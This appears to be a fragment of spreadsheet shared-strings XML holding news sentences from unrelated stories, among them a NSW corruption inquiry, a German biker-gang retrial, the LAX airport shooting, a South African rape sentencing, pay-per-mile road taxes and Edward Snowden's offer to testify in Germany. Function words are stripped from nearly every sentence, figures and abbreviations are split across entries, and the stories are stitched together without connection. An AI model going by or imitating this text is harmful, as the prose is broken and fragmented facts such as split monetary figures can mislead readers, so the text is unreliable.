    <t xml:space="preserve"> Former NSW minister Joe Tripodi denied changing maritime leases policy request political mentor Eddie Obeid , hidden interests three properties government-controlled land </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</si>
  <si>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</si>
  <si>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 It &amp;apos;s investigating allegations Mr Tripodi knew Mr Obeid &amp;apos;s secret interest properties , evidence given Mr Tripodi &amp;apos;s former deputy chief staff , Lynne Ashpole , Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> During years discussions starting 2005 government pushing leases go public tender </t>
  </si>
  <si>
    <t xml:space="preserve"> The lessees also wanted longer terms </t>
  </si>
  <si>
    <t xml:space="preserve"> In 2009 leases Circular Quay enterprises , earned Obeids $ 2</t>
  </si>
  <si>
    <t xml:space="preserve">5 million annually , renewed without going public tender </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Tripodi , ports minister February 2006 November 2009 , initially favour public tenders </t>
  </si>
  <si>
    <t xml:space="preserve"> But denied changes made request Mr Obeid , Mr Tripodi acknowledged urging shift government lease policy </t>
  </si>
  <si>
    <t xml:space="preserve"> A phone transcript tabled ICAC showed calls August September 2007 Mr Obeid , Mr Tripodi Steve Dunn , senior bureaucrat come ports ministry working Mr Obeid fisheries department </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Was matter discussed course telephone conversations development commercial lease policy , &amp;quot; Assistant Commissioner Anthony Whealy asked Mr Tripodi </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; No , &amp;quot; Mr Tripodi replied </t>
  </si>
  <si>
    <t xml:space="preserve"> I &amp;apos;t remember discussed definitely &amp;apos;t </t>
  </si>
  <si>
    <t xml:space="preserve"> Definitely Mr Obeid </t>
  </si>
  <si>
    <t xml:space="preserve"> Leg almost hacked off: Rocker retrial A bloody attack within &amp;apos; Rocker &amp;apos; scene re-investigated four years </t>
  </si>
  <si>
    <t xml:space="preserve"> Proceedings attempted murder , grievous bodily harm material damage , brought two 30-year-olds begun Frankfurt District Court </t>
  </si>
  <si>
    <t xml:space="preserve"> They accompanied strict security precautions </t>
  </si>
  <si>
    <t xml:space="preserve"> They said active within Rocker scene time belonged Bandidos </t>
  </si>
  <si>
    <t xml:space="preserve"> The Public Prosecutor accused stabbed beaten three men car Finowfurt , together unknown accomplices </t>
  </si>
  <si>
    <t xml:space="preserve"> All victims seriously injured , one man almost losing leg </t>
  </si>
  <si>
    <t xml:space="preserve"> The victims said belonged competing gang , Hell &amp;apos;s Angels </t>
  </si>
  <si>
    <t xml:space="preserve"> One said high-ranking member Berlin </t>
  </si>
  <si>
    <t xml:space="preserve"> It seems attack preceded car chase involving several cars </t>
  </si>
  <si>
    <t xml:space="preserve"> According accusations , part turf war represented demonstration power </t>
  </si>
  <si>
    <t xml:space="preserve"> The two accused acquitted initial trial beginning 2012 </t>
  </si>
  <si>
    <t xml:space="preserve"> At time , speaker court said could proven men actually involved bloody feud </t>
  </si>
  <si>
    <t xml:space="preserve"> The assailants worn masks recognised </t>
  </si>
  <si>
    <t xml:space="preserve"> The Federal Supreme Court repealed verdict following appeal Public Prosecutor &amp;apos;s Office referred case back District Court re-trial </t>
  </si>
  <si>
    <t xml:space="preserve"> One accused currently serving time open prison account another offence </t>
  </si>
  <si>
    <t xml:space="preserve"> Proceedings initially mainly involved reconstruction series events night crime </t>
  </si>
  <si>
    <t xml:space="preserve"> The police inspector responsible time invited witness </t>
  </si>
  <si>
    <t xml:space="preserve"> The central point focus mobile phone conversations accused third parties , police intercepted </t>
  </si>
  <si>
    <t xml:space="preserve"> What makes things difficult Rockers almost always observe consider complete silence appearing court - say absolutely nothing </t>
  </si>
  <si>
    <t xml:space="preserve"> This also applies case victims </t>
  </si>
  <si>
    <t xml:space="preserve"> In first trial , one victims spoke </t>
  </si>
  <si>
    <t xml:space="preserve"> When asked , Public Prosecutor Stefan Golfier Frankfurt (Oder) Public Prosecutor &amp;apos;s Office said new evidence come light since previous trial </t>
  </si>
  <si>
    <t xml:space="preserve"> A eleven days proceedings scheduled trial </t>
  </si>
  <si>
    <t xml:space="preserve"> Car driver seriously injured accident A 37-year-old car driver Aachen seriously injured accident Thursday evening </t>
  </si>
  <si>
    <t xml:space="preserve"> According information police , 41-year-old Müsch travelling car Kempener bypass direction Grefrath , around 9</t>
  </si>
  <si>
    <t>15 p</t>
  </si>
  <si>
    <t xml:space="preserve"> As went turn right onto St</t>
  </si>
  <si>
    <t xml:space="preserve"> Töniser Straße failed see 37-year-old &amp;apos;s oncoming vehicle </t>
  </si>
  <si>
    <t xml:space="preserve"> The vehicles collided </t>
  </si>
  <si>
    <t xml:space="preserve"> Foreign workers 457 visas could undergo &amp;quot; genuineness &amp;quot; test A &amp;quot; genuineness &amp;quot; test foreign workers 457 visas considered government contemplates expanding crackdown </t>
  </si>
  <si>
    <t xml:space="preserve"> The test , adopted , would applied criteria aimed preventing 457s used fill unskilled positions back door way move family friends Australia </t>
  </si>
  <si>
    <t xml:space="preserve"> A government discussion paper released today former Labor MP Maxine McKew slammed government &amp;apos;s rhetoric foreign workers , saying could offend Australia &amp;apos;s neighbours </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Loud declarations &amp;apos; foreigners getting back queue &amp;apos; &amp;apos; Aussie jobs first &amp;apos; unpleasant throwback time unions demanded protected labor market , &amp;quot; told Australia India Institute today </t>
  </si>
  <si>
    <t xml:space="preserve"> Historically , meant white labour protected - region saw echoes historic artifact , I &amp;apos;t surprised </t>
  </si>
  <si>
    <t xml:space="preserve"> The discussion paper outlines 12 measures previously considered former Immigration Minister Chris Bowen </t>
  </si>
  <si>
    <t xml:space="preserve"> Immigration Minister Brendan O &amp;apos;Connor , yesterday Sri Lanka meeting officials people smuggling , implemented five recommended changes remainder consideration </t>
  </si>
  <si>
    <t xml:space="preserve"> If &amp;quot; genuineness &amp;quot; criteria adopted visa applicant could scrutinised &amp;quot; whether nomination genuine circumstances nominee relation personal associate owner relevant person sponsoring business </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Businesses could also required account number 457 visa holders previously businesses intended sponsor small number workers employed hundreds </t>
  </si>
  <si>
    <t xml:space="preserve"> Meanwhile , 35-year-old Sri Lankan asylum seeker died suspected heart attack arriving asylum boat Christmas Island week </t>
  </si>
  <si>
    <t xml:space="preserve"> The man &amp;apos;s distraught nine-year-old son travelled Australia comforted since death father Wednesday adult cousin also vessel </t>
  </si>
  <si>
    <t xml:space="preserve"> Australian authorities rushed man Christmas Island Hospital , died </t>
  </si>
  <si>
    <t xml:space="preserve"> USA: Shots fired Los Angeles Airport On Friday morning (local time) unknown suspect fired shots LAX Airport </t>
  </si>
  <si>
    <t xml:space="preserve"> While airport management announced via short messaging service Twitter shooter custody , &amp;quot; Los Angeles Times &amp;quot; reported man dead </t>
  </si>
  <si>
    <t xml:space="preserve"> A member security staff also killed </t>
  </si>
  <si>
    <t xml:space="preserve"> The media also reported several people injured </t>
  </si>
  <si>
    <t xml:space="preserve"> US President Barack Obama kept informed situation , said White House spokesperson Jay Carney </t>
  </si>
  <si>
    <t xml:space="preserve"> The incident took place Terminal 3 </t>
  </si>
  <si>
    <t xml:space="preserve"> Eye witnesses reported seeing shooter gun one departure lounges , reported several media </t>
  </si>
  <si>
    <t xml:space="preserve"> One traveller told broadcaster CNN many people sought protection panic </t>
  </si>
  <si>
    <t xml:space="preserve"> Travellers screamed children cried </t>
  </si>
  <si>
    <t xml:space="preserve"> Panic broke among waiting , many hiding behind seats fear </t>
  </si>
  <si>
    <t xml:space="preserve"> An employee &amp;quot; Los Angeles Times &amp;quot; travelling time told heard two shots fired </t>
  </si>
  <si>
    <t xml:space="preserve"> An employee security company TSA suffered gunshot wound foot </t>
  </si>
  <si>
    <t xml:space="preserve"> The scene &amp;quot; like something movie &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> The man reported taken safety area </t>
  </si>
  <si>
    <t xml:space="preserve"> The shots said fired near security inspection area </t>
  </si>
  <si>
    <t xml:space="preserve"> Airport building evacuated Television footage revealed numerous ambulances police cars arrived terminal </t>
  </si>
  <si>
    <t xml:space="preserve"> One hundred people brought building safety </t>
  </si>
  <si>
    <t xml:space="preserve"> Users Twitter published photos SWAT officer weapon lying ground </t>
  </si>
  <si>
    <t xml:space="preserve"> According message shared airport management via twitter , incident began 9</t>
  </si>
  <si>
    <t>30 (local time)</t>
  </si>
  <si>
    <t xml:space="preserve"> Except landing arrival aircraft , flight traffic temporarily suspended , reported </t>
  </si>
  <si>
    <t xml:space="preserve"> However , several planes could seen taking CNN </t>
  </si>
  <si>
    <t xml:space="preserve"> Terminal 3 serves mainly small US airlines </t>
  </si>
  <si>
    <t xml:space="preserve"> The Los Angeles LAX airport one largest airports USA </t>
  </si>
  <si>
    <t xml:space="preserve"> Maintenance day small &amp;apos; Engländerhütte &amp;apos; For fifth maintenance day follow-up Natura 2000 project Upper Hotzenwald , group dedicated participants met small Engländerhütte (Englishman &amp;apos;s Cottage) Ibach Following suggestions population , valley area cottage cleared , said Mayor Helmut Kaiser </t>
  </si>
  <si>
    <t xml:space="preserve"> According Kaiser , many hikers refer area showpiece Schluchtensteig , landscape provides ideal framework fantastic views </t>
  </si>
  <si>
    <t xml:space="preserve"> He thanked present willingness cooperate emphasised maintenance day suitable instrument strengthen connection people nature , He offering every citizen opportunity focus nature </t>
  </si>
  <si>
    <t xml:space="preserve"> At time tourist aspect , environmental aspects also taken consideration </t>
  </si>
  <si>
    <t xml:space="preserve"> This environmental aspect explained Friederike Tribukait Department Nature Conservation Freiburg Regional Council , following greeting Regional Councillor Tilman Bollacher , taken role patron wished campaign every success </t>
  </si>
  <si>
    <t xml:space="preserve"> According Tribukait , tourist objective vision coincided goal preserving extremely overgrown old Allmend grazing pasture , specific protected habitats , opening connection still existing grazing land </t>
  </si>
  <si>
    <t xml:space="preserve"> Certain species , rare butterflies grasshoppers , cannot get past barriers form forest areas </t>
  </si>
  <si>
    <t xml:space="preserve"> They require clear pathways order preserve species </t>
  </si>
  <si>
    <t xml:space="preserve"> Tribukait said want fail use opportunity say word defence planned biosphere area </t>
  </si>
  <si>
    <t xml:space="preserve"> The current measures integrate seamlessly plans </t>
  </si>
  <si>
    <t xml:space="preserve"> A biosphere area offers chance sustainable economic ecological development basis internationally recognised Unesco status , thus offers extension achieved thus far Life Project previous care days </t>
  </si>
  <si>
    <t xml:space="preserve"> After various statements , forest ranger Christoph Wehle Life Project manager Cornelia Bischoff divided helpers groups </t>
  </si>
  <si>
    <t xml:space="preserve"> The larger trees cut advance , although forest tractors on-call required </t>
  </si>
  <si>
    <t xml:space="preserve"> One group helpers take care clearance juniper bushes maintenance dry stone wall </t>
  </si>
  <si>
    <t xml:space="preserve"> The objective create clear view viewpoint </t>
  </si>
  <si>
    <t xml:space="preserve"> Rapist South Africa: two life sentences Nine months brutal rape mutilation 17-year-old girl South Africa , perpetrator condemned two life sentences Friday </t>
  </si>
  <si>
    <t xml:space="preserve"> This reported broadcaster SABC </t>
  </si>
  <si>
    <t xml:space="preserve"> The victim later died result serious injuries </t>
  </si>
  <si>
    <t xml:space="preserve"> Johannes Kana already found guilty crime start week </t>
  </si>
  <si>
    <t xml:space="preserve"> The crime caused nationwide horror </t>
  </si>
  <si>
    <t xml:space="preserve"> For 14 hours , doctors battled save life victim , ultimately vain </t>
  </si>
  <si>
    <t xml:space="preserve"> The sight young girl horrific carers nursing staff required psychological support </t>
  </si>
  <si>
    <t xml:space="preserve"> During trial , Kana admitted bar Booysen night attack </t>
  </si>
  <si>
    <t xml:space="preserve"> He also admitted beating raping , however denied responsible death girl </t>
  </si>
  <si>
    <t xml:space="preserve"> The police initially assumed multiple attackers , however , released two suspects custody evidence insufficient </t>
  </si>
  <si>
    <t xml:space="preserve"> During proceedings public prosecution also emphasised convinced Kana alone time attack </t>
  </si>
  <si>
    <t xml:space="preserve"> Rapes almost part everyday life South Africa: There around 64,000 reports sexual assault every year </t>
  </si>
  <si>
    <t xml:space="preserve"> This almost ten times many Germany , although population 82 million people , Germany much higher number residents South Africa (50 million)</t>
  </si>
  <si>
    <t xml:space="preserve"> Police women &amp;apos;s associations South Africa , however , estimate number unreported cases sexual assault 10-25 times high </t>
  </si>
  <si>
    <t xml:space="preserve"> Pope Francis name first cardinals February Pope Francis create new cardinals Catholic Church first time February 22 , Vatican announced Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> Cardinals highest-ranking clergy Catholic Church pope , &amp;apos;re ones elect popes , Francis appointing first group men ultimately help choose successor </t>
  </si>
  <si>
    <t xml:space="preserve"> There 201 cardinals </t>
  </si>
  <si>
    <t xml:space="preserve"> However , cardinal reaches 80 longer permitted participate election pope -- falls group 120 &amp;quot; cardinal electors </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In statement announcing news , Father Federico Lombardi , Vatican spokesman , said meeting existing cardinals would held ceremony elevate new cardinals , known consistory </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Pope Francis decided communicate decision convoke February &amp;apos;s consistory advance order facilitate planning meetings involving participation cardinals different parts world , &amp;quot; Lombardi said </t>
  </si>
  <si>
    <t xml:space="preserve"> Jack Valero Catholic Voices said February , number cardinal electors likely dropped </t>
  </si>
  <si>
    <t xml:space="preserve"> He said usually pope would name many cardinals needed raise number cardinal electors back 120 many cardinals aged 80 wanted </t>
  </si>
  <si>
    <t xml:space="preserve"> Next year &amp;apos;s consistory would significant would first since Francis elected March year , Valero said </t>
  </si>
  <si>
    <t xml:space="preserve"> At moment sort bias towards Europe especially towards Italy </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It interesting see whether new Pope nominate cardinals rest world restore balance , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> Forty percent Roman Catholics South America , tiny number cardinals </t>
  </si>
  <si>
    <t xml:space="preserve"> The cardinals also first chosen since Francis formed Council Cardinals , group eight cardinals around world tasked looking ways reform church </t>
  </si>
  <si>
    <t xml:space="preserve"> In past Pope decided everything </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Now Francis selected eight cardinals help , &amp;quot; Valero said </t>
  </si>
  <si>
    <t xml:space="preserve"> He said &amp;quot; quite possible &amp;quot; Francis would ask cardinals advice </t>
  </si>
  <si>
    <t xml:space="preserve"> But &amp;apos;ve situation -- &amp;apos;s completely new </t>
  </si>
  <si>
    <t xml:space="preserve"> Valero said popes typically elevated bishops large places position cardinal Francis &amp;quot; full surprises -- &amp;apos;t know &amp;apos;ll name </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The 100-year-old natural stone wall , serving foremost boundary old school yard - due renovated - Kirchstrasse , feature renovation cost plan town Bräunlingen </t>
  </si>
  <si>
    <t xml:space="preserve"> In days Kilbig Autumn Folk Festival , first renovation work carried front school yard , small corner wall balustrades installed stabilise relieve static load old natural stone wall , one hundred years old </t>
  </si>
  <si>
    <t xml:space="preserve"> According Alexander Misok Bräunlingen Municipal Planning Building Control Authority , ongoing procedure plans involve Regional Memorial Authority planning stage draw renovation concept old wall </t>
  </si>
  <si>
    <t xml:space="preserve"> A cost calculation performed team professionals , submitted Town Council , make decision determine ongoing procedure </t>
  </si>
  <si>
    <t xml:space="preserve"> A decision expected made coming year </t>
  </si>
  <si>
    <t xml:space="preserve"> Following renovation , plastering planting trees old internal school yard , within two wings 1912 school , subsequent measure boundary wall , need refurbishment , must renovated ground within foreseeable future </t>
  </si>
  <si>
    <t xml:space="preserve"> The historic , one hundred-year-old boundary wall old school-yard Kirchstrasse need renovation , primarily result water frost damage , account lack drainage , leaning forwards </t>
  </si>
  <si>
    <t xml:space="preserve"> Deep cracks number individual stones testify weather damage , however , present wall danger collapse </t>
  </si>
  <si>
    <t xml:space="preserve"> A secure wall essential school yard used pupils , purpose current fortification work </t>
  </si>
  <si>
    <t xml:space="preserve"> The school yard renovation originally planned back 2008 / 2009 , however , high unplanned expenses meant work pushed back </t>
  </si>
  <si>
    <t xml:space="preserve"> The Regional Memorial Authority major say historic school wall renovation , even used filming </t>
  </si>
  <si>
    <t xml:space="preserve"> If authority impose requirements , town Bräunlingen would hope receive subsidies monument preservationists </t>
  </si>
  <si>
    <t xml:space="preserve"> The pupils Bräunlingen Primary School , taught well renovated old school building , new hall , soon able use old school yard well </t>
  </si>
  <si>
    <t xml:space="preserve"> A black box car ? As America &amp;apos;s road planners struggle find cash mend crumbling highway system , many beginning see solution little black box fits neatly dashboard car </t>
  </si>
  <si>
    <t xml:space="preserve"> The devices , track every mile motorist drives transmit information bureaucrats , center controversial attempt Washington state planning offices overhaul outdated system funding America &amp;apos;s major roads </t>
  </si>
  <si>
    <t xml:space="preserve"> The usually dull arena highway planning suddenly spawned intense debate colorful alliances </t>
  </si>
  <si>
    <t xml:space="preserve"> Libertarians joined environmental groups lobbying allow government use little boxes keep track miles drive , possibly drive - use information draw tax bill </t>
  </si>
  <si>
    <t xml:space="preserve"> The tea party aghast </t>
  </si>
  <si>
    <t xml:space="preserve"> The American Civil Liberties Union deeply concerned , , raising variety privacy issues </t>
  </si>
  <si>
    <t xml:space="preserve"> And Congress &amp;apos;t agree whether proceed , several states waiting </t>
  </si>
  <si>
    <t xml:space="preserve"> They exploring , next decade , move system drivers pay per mile road roll </t>
  </si>
  <si>
    <t xml:space="preserve"> Thousands motorists already taken black boxes , GPS monitoring , test drive </t>
  </si>
  <si>
    <t xml:space="preserve"> This really must nation </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It matter something might choose , &amp;quot; said Hasan Ikhrata , executive director Southern California Assn</t>
  </si>
  <si>
    <t xml:space="preserve"> Governments , planning state start tracking miles driven every California motorist 2025 </t>
  </si>
  <si>
    <t xml:space="preserve"> There going change pay taxes </t>
  </si>
  <si>
    <t xml:space="preserve"> The technology </t>
  </si>
  <si>
    <t xml:space="preserve"> The push comes country &amp;apos;s Highway Trust Fund , financed taxes Americans pay gas pump , broke </t>
  </si>
  <si>
    <t xml:space="preserve"> Americans &amp;apos;t buy much gas used </t>
  </si>
  <si>
    <t xml:space="preserve"> Cars get many miles gallon </t>
  </si>
  <si>
    <t xml:space="preserve"> The federal tax , 18</t>
  </si>
  <si>
    <t xml:space="preserve">4 cents per gallon , &amp;apos;t gone 20 years </t>
  </si>
  <si>
    <t xml:space="preserve"> Politicians loath raise tax even one penny gas prices high </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The gas tax sustainable , &amp;quot; said Lee Munnich , transportation policy expert University Minnesota </t>
  </si>
  <si>
    <t xml:space="preserve"> His state recently put tracking devices 500 cars test pay-by-mile system </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This works logical alternative long term , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> Wonks call mileage-based user fee </t>
  </si>
  <si>
    <t xml:space="preserve"> It surprise idea appeals urban liberals , taxes could rigged change driving patterns ways could help reduce congestion greenhouse gases , example </t>
  </si>
  <si>
    <t xml:space="preserve"> California planners looking system devise strategies meet goals laid state &amp;apos;s ambitious global warming laws </t>
  </si>
  <si>
    <t xml:space="preserve"> But Rep</t>
  </si>
  <si>
    <t xml:space="preserve"> Bill Shuster (R-Pa </t>
  </si>
  <si>
    <t xml:space="preserve">), chairman House Transportation Committee , said , , sees viable long-term alternative </t>
  </si>
  <si>
    <t xml:space="preserve"> The free marketeers Reason Foundation also fond drivers pay per mile </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This tax going black hole , &amp;quot; said Adrian Moore , vice president policy Reason </t>
  </si>
  <si>
    <t xml:space="preserve"> People paying directly getting </t>
  </si>
  <si>
    <t xml:space="preserve"> The movement also bolstered two former U</t>
  </si>
  <si>
    <t xml:space="preserve"> Transportation secretaries , 2011 report urged Congress move pay-per-mile direction </t>
  </si>
  <si>
    <t xml:space="preserve"> Senate approved $ 90-million pilot project last year would involved 10,000 cars </t>
  </si>
  <si>
    <t xml:space="preserve"> But House leadership killed proposal , acting concerns rural lawmakers representing constituents whose daily lives often involve logging lots miles get work town </t>
  </si>
  <si>
    <t xml:space="preserve"> The eager Oregon , enlisting 5,000 drivers country &amp;apos;s biggest experiment </t>
  </si>
  <si>
    <t xml:space="preserve"> Those drivers soon pay mileage fees instead gas taxes state </t>
  </si>
  <si>
    <t xml:space="preserve"> Nevada already completed pilot </t>
  </si>
  <si>
    <t xml:space="preserve"> New York City looking one </t>
  </si>
  <si>
    <t xml:space="preserve"> Illinois trying limited basis trucks </t>
  </si>
  <si>
    <t xml:space="preserve"> And I-95 Coalition , includes 17 state transportation departments along Eastern Seaboard (including Maryland , Pennsylvania , Virginia Florida), studying could go implementing change </t>
  </si>
  <si>
    <t xml:space="preserve"> The concept universal hit </t>
  </si>
  <si>
    <t xml:space="preserve"> In Nevada , 50 volunteers &amp;apos; cars equipped devices long ago , drivers uneasy government able monitor every move </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Concerns Big Brother sorts things major problem , &amp;quot; said Alauddin Khan , directs strategic performance management Nevada Department Transportation </t>
  </si>
  <si>
    <t xml:space="preserve"> It something people wanted </t>
  </si>
  <si>
    <t xml:space="preserve"> As trial got underway , ACLU Nevada warned website: &amp;quot; It would fairly easy turn devices full-fledged tracking devices </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There need build enormous , unwieldy technological infrastructure inevitably expanded keep records individuals &amp;apos; everyday comings goings </t>
  </si>
  <si>
    <t xml:space="preserve"> Nevada among several states scrambling find affordable technology would allow state keep track many miles car driven , exactly time </t>
  </si>
  <si>
    <t xml:space="preserve"> If , Khan said , public gets comfortable </t>
  </si>
  <si>
    <t xml:space="preserve"> The hunt technology led state agencies small California startup called True Mileage </t>
  </si>
  <si>
    <t xml:space="preserve"> The firm originally business helping states tax drivers </t>
  </si>
  <si>
    <t xml:space="preserve"> It seeking break emerging market auto insurance , drivers would pay based mileage </t>
  </si>
  <si>
    <t xml:space="preserve"> But devices testing appeal highway planners &amp;apos;t use GPS deliver limited amount information , uploaded periodically modem </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; People willing track speed track location , &amp;quot; said Ryan Morrison , chief executive True Mileage </t>
  </si>
  <si>
    <t xml:space="preserve"> There big mistakes state pilot programs </t>
  </si>
  <si>
    <t xml:space="preserve"> There lot less expensive less intrusive ways </t>
  </si>
  <si>
    <t xml:space="preserve"> In Oregon , planners experimenting giving drivers different choices </t>
  </si>
  <si>
    <t xml:space="preserve"> They choose device without GPS </t>
  </si>
  <si>
    <t xml:space="preserve"> Or choose device , opting instead pay flat fee based average number miles driven state residents </t>
  </si>
  <si>
    <t xml:space="preserve"> Other places hoping sell concept wary public devices , less </t>
  </si>
  <si>
    <t xml:space="preserve"> In New York City , transportation officials seeking develop taxing device would also equipped pay parking meter fees , provide &amp;quot; pay-as-you-drive &amp;quot; insurance , create pool real-time speed data drivers motorists could use avoid traffic </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Motorists would attracted participate value benefits offers , &amp;quot; says city planning document </t>
  </si>
  <si>
    <t xml:space="preserve"> Some transportation planners , though , wonder talk paying mile giant distraction </t>
  </si>
  <si>
    <t xml:space="preserve"> At Metropolitan Transportation Commission San Francisco Bay Area , officials say Congress could simply deal bankrupt Highway Trust Fund raising gas taxes </t>
  </si>
  <si>
    <t xml:space="preserve"> An extra one-time annual levy could imposed drivers hybrids others whose vehicles &amp;apos;t use much gas , pay fair share </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There need radical surgery need take aspirin , &amp;quot; said Randy Rentschler , commission &amp;apos;s director legislation public affairs </t>
  </si>
  <si>
    <t xml:space="preserve"> If , hundreds millions drivers concerned privacy host things </t>
  </si>
  <si>
    <t xml:space="preserve"> Snowden may make statements Russia The former US intelligence expert , Edward Snowden , may make statements regarding US espionage scandal Russian asylum </t>
  </si>
  <si>
    <t xml:space="preserve"> Representatives Federal Prosecutor could either submit questions writing meet 30-year-old person Russia </t>
  </si>
  <si>
    <t xml:space="preserve"> This reported Interfax Agency reference groups aware situation , named greater detail </t>
  </si>
  <si>
    <t xml:space="preserve"> Such matters clarified intergovernmental level , stated </t>
  </si>
  <si>
    <t xml:space="preserve"> A departure Snowden Russia virtually impossible </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; If happen , would lose status refugee , &amp;quot; said Agency , quoting source </t>
  </si>
  <si>
    <t xml:space="preserve"> Because Germany ally USA , Snowden would risk deportation travel , source continued </t>
  </si>
  <si>
    <t xml:space="preserve"> Open-air concert accompanied high summer temperatures </t>
  </si>
  <si>
    <t xml:space="preserve"> The Hammereisenbach Music Society gave open-air concert terrace Hammer Guest House </t>
  </si>
  <si>
    <t xml:space="preserve"> When conductor , Bianca Willmann , raised baton 7: 30 p</t>
  </si>
  <si>
    <t xml:space="preserve"> , thermometer still reading 25 degrees </t>
  </si>
  <si>
    <t xml:space="preserve"> Around 50 listeners enjoyed sounds Hammrich musicians </t>
  </si>
  <si>
    <t xml:space="preserve"> Chairperson , Manuela Honeck , provided explanation accompany pieces </t>
  </si>
  <si>
    <t xml:space="preserve"> In , Honeck thanked helped successfully manage first Musikerhock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</si>
  <si>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</si>
  <si>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 German MP Hans-Christian Ströbele Thursday met Mr Snowden Russia , granted asylum , discuss testifying Germany </t>
  </si>
  <si>
    <t xml:space="preserve"> A letter Mr Snowden , presented media Berlin Friday MP , said: &amp;quot; Though outcome efforts demonstrably positive , government continues treat dissent defection , seeks criminalise political speech felony charges provide defence </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; However , speaking truth crime </t>
  </si>
  <si>
    <t xml:space="preserve"> In letter , Mr Snowden said believed support international community could persuade US government abandon criminal charges </t>
  </si>
  <si>
    <t xml:space="preserve"> The charges filed US justice department include espionage theft government property </t>
  </si>
  <si>
    <t xml:space="preserve"> Hans-Peter Friedrich , German interior minister , told Zeit Online: &amp;quot; If Mr Snowden ready speak German officials , find ways make possible </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Relations US Germany come strain following claims NSA bugged Chancellor Angela &amp;apos;s Merkel &amp;apos;s phone </t>
  </si>
  <si>
    <t xml:space="preserve"> Thomas Oppermann , MP heads parliamentary panel oversees intelligence , said opportunity hear Mr Snowden witness &amp;quot; without bringing danger completely ruining relations US , &amp;quot; taken </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Ströbele , MP Germany &amp;apos;s Green party , published picture Mr Snowden Twitter feed </t>
  </si>
  <si>
    <t xml:space="preserve"> He accompanied visit Russia two German journalists </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Ströbele said , according former NSA contractor &amp;apos;s lawyer , Mr Snowden would able return Russia left </t>
  </si>
  <si>
    <t xml:space="preserve"> If Mr Snowden testified Germany would need assurances would &amp;quot; safe &amp;quot; , MP said </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Snowden said letter faced &amp;quot; severe sustained &amp;quot; campaign persecution forced home </t>
  </si>
  <si>
    <t xml:space="preserve"> However said heartened worldwide response &amp;quot; act political expression </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Citizens around world well high officials - including United States - judged revelation unaccountable system pervasive surveillance public service </t>
  </si>
  <si>
    <t xml:space="preserve"> The letter extends offer cooperate German authorities &amp;quot; difficulties humanitarian situation resolved </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Arctic Monkeys postpone Glasgow gig due Alex Turner &amp;apos;s illness Rock band Arctic Monkeys postponed gig Glasgow lead singer diagnosed laryngitis </t>
  </si>
  <si>
    <t xml:space="preserve"> The Sheffield group scheduled perform Hydro venue city Friday </t>
  </si>
  <si>
    <t xml:space="preserve"> However , lead singer Alex Turner &amp;apos;s illness forced reschedule show </t>
  </si>
  <si>
    <t xml:space="preserve"> The band &amp;apos;s announcement came forced similarly postpone gig LG Arena Birmingham Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> In statement official website , Arctic Monkeys said: &amp;quot; Following decision postpone show Birmingham LG Arena tonight seeking medical advice , Arctic Monkeys must also postpone show Glasgow Hydro Friday , November 1 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; &amp;quot; Alex Turner diagnosed laryngitis regrettably able perform </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The show LG Arena Birmingham take place November 20 show Glasgow Hydro take place November 21 </t>
  </si>
  <si>
    <t xml:space="preserve"> All tickets remain valid shows </t>
  </si>
  <si>
    <t xml:space="preserve"> We wish apologise ticket holders inconvenience caused </t>
  </si>
  <si>
    <t xml:space="preserve"> Please contact customer services box office purchased tickets assistance </t>
  </si>
  <si>
    <t xml:space="preserve"> Travelling BVB fans created terrible scenes flares Veltins Arena district derby Schalke Borussia Dortmund announced would serious consequences </t>
  </si>
  <si>
    <t xml:space="preserve"> Before Friday &amp;apos;s Bundesliga match VfB Stuttgart , &amp;apos; Ultras &amp;apos; responded silence - initially </t>
  </si>
  <si>
    <t xml:space="preserve"> It unusual , almost ghostly atmosphere fans created shortly kick-off Bundesliga match German runners-up Borussia Dortmend VfB Stuttgart , Signal Iduna Park </t>
  </si>
  <si>
    <t xml:space="preserve"> It mainly chants away fans could heard </t>
  </si>
  <si>
    <t xml:space="preserve"> The south stand , hand , loyal - loudest - BVB fans stand , initially unusually quiet: No singing battle cries </t>
  </si>
  <si>
    <t xml:space="preserve"> The &amp;apos; Capo &amp;apos;s &amp;apos; podium , individual usually coordinates unison chants , remained empty </t>
  </si>
  <si>
    <t xml:space="preserve"> And right front , stand , single large flag text &amp;quot; Stadium Ban Section &amp;quot; blew wind </t>
  </si>
  <si>
    <t xml:space="preserve"> Only goalkeeper , Roman Weidenfeller , first BVB player step onto field , cheers briefly erupt , usually case </t>
  </si>
  <si>
    <t xml:space="preserve"> When team mates followed , loud singing scarves waving - means everywhere </t>
  </si>
  <si>
